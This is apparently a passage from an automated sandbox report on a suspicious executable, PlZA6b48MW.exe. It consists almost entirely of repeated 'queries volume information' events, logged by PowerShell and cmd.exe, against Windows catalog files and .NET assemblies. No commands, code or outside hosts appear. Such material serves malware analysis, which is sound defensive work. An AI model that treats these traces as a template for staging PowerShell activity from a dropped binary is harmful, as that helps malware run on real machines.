                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeQueries volume information: C:\Users\user\Desktop\PlZA6b48MW.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
